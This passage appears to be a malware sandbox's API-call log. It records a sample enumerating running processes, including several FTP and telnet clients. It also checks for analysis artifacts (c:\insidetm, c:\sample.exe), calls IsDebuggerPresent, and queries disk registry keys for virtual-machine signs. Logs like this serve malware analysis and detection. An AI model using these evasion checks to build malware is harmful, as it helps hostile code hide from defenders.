| out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.575] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.575] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0099.576] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0099.576] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0099.577] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.577] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.578] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0099.578] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0099.579] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0099.579] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0099.580] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0099.582] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0099.583] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0099.584] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0099.584] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0099.585] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0099.586] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0099.586] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0099.587] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0099.587] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0099.588] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0099.588] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0099.589] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0099.589] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0099.590] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0099.590] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0099.591] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0099.591] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0099.592] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0099.592] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0099.593] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0099.593] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0099.594] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0099.595] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0099.595] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0099.867] GlobalLock (hMem=0x45000c) returned 0x588f38 [0099.867] GlobalHandle (pMem=0x588f38) returned 0x45000c [0099.867] GlobalUnlock (hMem=0x45000c) returned 0 [0099.867] GlobalLock (hMem=0x45000c) returned 0x588f38 [0099.867] GlobalLock (hMem=0x450004) returned 0x56f100 [0099.867] GlobalHandle (pMem=0x588f38) returned 0x45000c [0099.867] GlobalUnlock (hMem=0x45000c) returned 0 [0099.867] GlobalHandle (pMem=0x56f100) returned 0x450004 [0099.867] GlobalUnlock (hMem=0x450004) returned 0 [0099.867] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.872] Process32First (in: hSnapshot=0x180, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.370] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.370] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.370] GlobalUnlock (hMem=0x450004) returned 0 [0100.371] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.371] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.371] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.371] GlobalUnlock (hMem=0x450004) returned 0 [0100.371] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.371] GlobalUnlock (hMem=0x45000c) returned 0 [0100.371] GetFileAttributesA (lpFileName="c:\\insidetm" (normalized: "c:\\insidetm")) returned 0xffffffff [0100.371] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.371] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.371] GlobalUnlock (hMem=0x45000c) returned 0 [0100.371] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.371] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.371] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.371] GlobalUnlock (hMem=0x45000c) returned 0 [0100.371] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.371] GlobalUnlock (hMem=0x450004) returned 0 [0100.371] GetFileAttributesA (lpFileName="c:\\sample.exe" (normalized: "c:\\sample.exe")) returned 0xffffffff [0100.372] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0100.372] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.372] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.372] GlobalUnlock (hMem=0x450004) returned 0 [0100.372] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.372] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.372] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.372] GlobalUnlock (hMem=0x450004) returned 0 [0100.372] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.372] GlobalUnlock (hMem=0x45000c) returned 0 [0100.372] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0100.372] IsDebuggerPresent () returned 0 [0100.372] FreeLibrary (hLibModule=0x76d30000) returned 1 [0100.373] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.373] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.373] GlobalUnlock (hMem=0x45000c) returned 0 [0100.373] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.373] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.373] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.373] GlobalUnlock (hMem=0x45000c) returned 0 [0100.373] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.373] GlobalUnlock (hMem=0x450004) returned 0 [0100.373] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.373] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.373] GlobalUnlock (hMem=0x450004) returned 0 [0100.373] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.373] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.373] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.373] GlobalUnlock (hMem=0x450004) returned 0 [0100.373] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.373] GlobalUnlock (hMem=0x45000c) returned 0 [0100.373] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Services\\Disk\\Enum", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fdf8 | out: phkResult=0x18fdf8*=0x190) returned 0x0 [0100.374] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x0, lpcbData=0x18fdf0*=0x0 | out: lpType=0x18fdf4*=0x1, lpData=0x0, lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.374] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x1e93418, lpcbData=0x18fdf0*=0x4c | out: lpType=0x18fdf4*=0x1, lpData="IDE\\DiskHD502HI_________________________________OF90____\\5&1981bee2&0&0.0.0", lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.374] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.374] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.374] GlobalUnlock (hMem=0x45000c) returned 0 [0100.374] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.374] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.374] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.374] GlobalUnlock (hMem=0x45000c) returned 0 [0100.374] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.374] GlobalUnlock (hMem=0x450004) returned 0 [0100.374] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.374] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.374] GlobalUnlock (hMem=0x450004) returned 0 [0100.374] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.375] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.375] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.375] GlobalUnlock (hMem=0x450004) returned 0 [0100.375] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.375] GlobalUnlock (hMem=0x45000c) returned 0 [0100.375] RegCloseKey (hKey=0x190) returned 0x0 [0100.375] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.375] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.375] GlobalUnlock (hMem=0x45000c) returned 0 [0100.375] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.375] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.375] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.375] GlobalUnlock (hMem=0x45000c) returned 0 [0100.375] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.375] GlobalUnlock (hMem=0x450004) returned 0 [0100.375] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.375] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.375] GlobalUnlock (hMem=0x450004) returned 0 [0100.376] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.376] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.376] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.376] GlobalUnlock (hMem=0x450004) returned 0 [0100.376] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.376] GlobalUnlock (hMem=0x45000c) returned 0 [0100.376] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Services\\Disk\\Enum", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fdf8 | out: phkResult=0x18fdf8*=0x190) returned 0x0 [0100.376] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x0, lpcbData=0x18fdf0*=0x0 | out: lpType=0x18fdf4*=0x1, lpData=0x0, lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.376] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x1e93418, lpcbData=0x18fdf0*=0x4c | out: lpType=0x18fdf4*=0x1, lpData="IDE\\DiskHD502HI_________________________________OF90____\\5&1981bee2&0&0.0.0", lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.376] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.376] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.376] GlobalUnlock (hMem=0x45000c) returned 0 [0100.377] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.377] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.377] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.377] GlobalUnlock (hMem=0x45000c) returned 0 [0100.377] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.377] GlobalUnlock (hMem=0x450004) returned 0 [0100.377] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.377] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.377] GlobalUnlock (hMem=0x450004) returned 0 [0100.377] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.377] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.377] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.377] GlobalUnlock (hMem=0x450004) returned 0 [0100.377] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.377] GlobalUnlock (hMem=0x45000c) returned 0 [0100.377] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.377] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.377] GlobalUnlock (hMem=0x45000c) returned 0 [0100.377] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.377] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.377] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.377] GlobalUnlock (hMem=0x45000c) returned 0 [0100.377] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.377] GlobalUnlock (hMem=0x450004) returned 0 [0100.377] RegCloseKey (hKey=0x190) returned 0x0 [0100.378] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.378] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.378] GlobalUnlock (hMem=0x450004) returned 0 [0100.378] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.378] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.378] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.378] GlobalUnlock (hMem=0x450004) returned 0 [0100.378] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.378] GlobalUnlock (hMem=0x45000c) returned 0 [0100.378] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.378] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.378] GlobalUnlock (hMem=0x45000c) returned 0 [0100.378] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.378] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.378] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.378] GlobalUnlock (hMem=0x45000c) returned 0 [0100.378] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.378] GlobalUnlock (hMem=0x450004) returned 0 [0100.378] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Services\\Disk\\Enum", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fdf8 | out: phkResult=0x18fdf8*=0x190) returned 0x0 [0100.378] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x0, lpcbData=0x18fdf0*=0x0 | out: lpType=0x18fdf4*=0x1, lpData=0x0, lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.379] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x1e93418, lpcbData=0x18fdf0*=0x4c | out: lpType=0x18fdf4*=0x1, lpData="IDE\\DiskHD502HI_________________________________OF90____\\5&1981bee2&0&0.0.0", lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.379] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.379] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.379] GlobalUnlock (hMem=0x450004) returned 0 [0100.379] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.379] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.379] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.379] GlobalUnlock (hMem=0x450004) returned 0 [0100.379] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.379] GlobalUnlock (hMem=0x45000c) returned 0 [0100.379] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.379] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.379] GlobalUnlock (hMem=0x45000c) returned 0 [0100.379] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.379] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.379] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.379] GlobalUnlock (hMem=0x45000c) returned 0 [0100.379] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.379] GlobalUnlock (hMem=0x450004) returned 0 [0100.379] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.379] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.379] GlobalUnlock (hMem=0x450004) returned 0 [0100.379] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.380] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.380] GlobalUnlock (hMem=0x450004) returned 0 [0100.380] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.380] GlobalUnlock (hMem=0x45000c) returned 0 [0100.380] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.380] GlobalUnlock (hMem=0x45000c) returned 0 [0100.380] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.380] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.380] GlobalUnlock (hMem=0x45000c) returned 0 [0100.380] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.380] GlobalUnlock (hMem=0x450004) returned 0 [0100.380] RegCloseKey (hKey=0x190) returned 0x0 [0100.380] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.380] GlobalUnlock (hMem=0x450004) returned 0 [0100.380] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.380] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.380] GlobalUnlock (hMem=0x450004) returned 0 [0100.380] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.380] GlobalUnlock (hMem=0x45000c) returned 0 [0100.380] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.381] GlobalUnlock (hMem=0x45000c) returned 0 [0100.381] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.381] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.381] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.381] GlobalUnlock (hMem=0x45000c) returned 0 [0100.381] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.381] GlobalUnlock (hMem=0x450004) returned 0 [0100.381] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Services\\Disk\\Enum", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fdf8 | out: phkResult=0x18fdf8*=0x190) returned 0x0 [0100.381] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x0, lpcbData=0x18fdf0*=0x0 | out: lpType=0x18fdf4*=0x1, lpData=0x0, lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.381] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x1e93418, lpcbData=0x18fdf0*=0x4c | out: lpType=0x18fdf4*=0x1, lpData="IDE\\DiskHD502HI_________________________________OF90____\\5&1981bee2&0&0.0.0", lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.381] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.381] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.381] GlobalUnlock (hMem=0x450004) returned 0 [0100.381] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.381] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.381] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.381] GlobalUnlock (hMem=0x450004) returned 0 [0100.381] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.382] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.382] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.382] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.382] GlobalLock (hMem=0x450004) returned 0x56f100 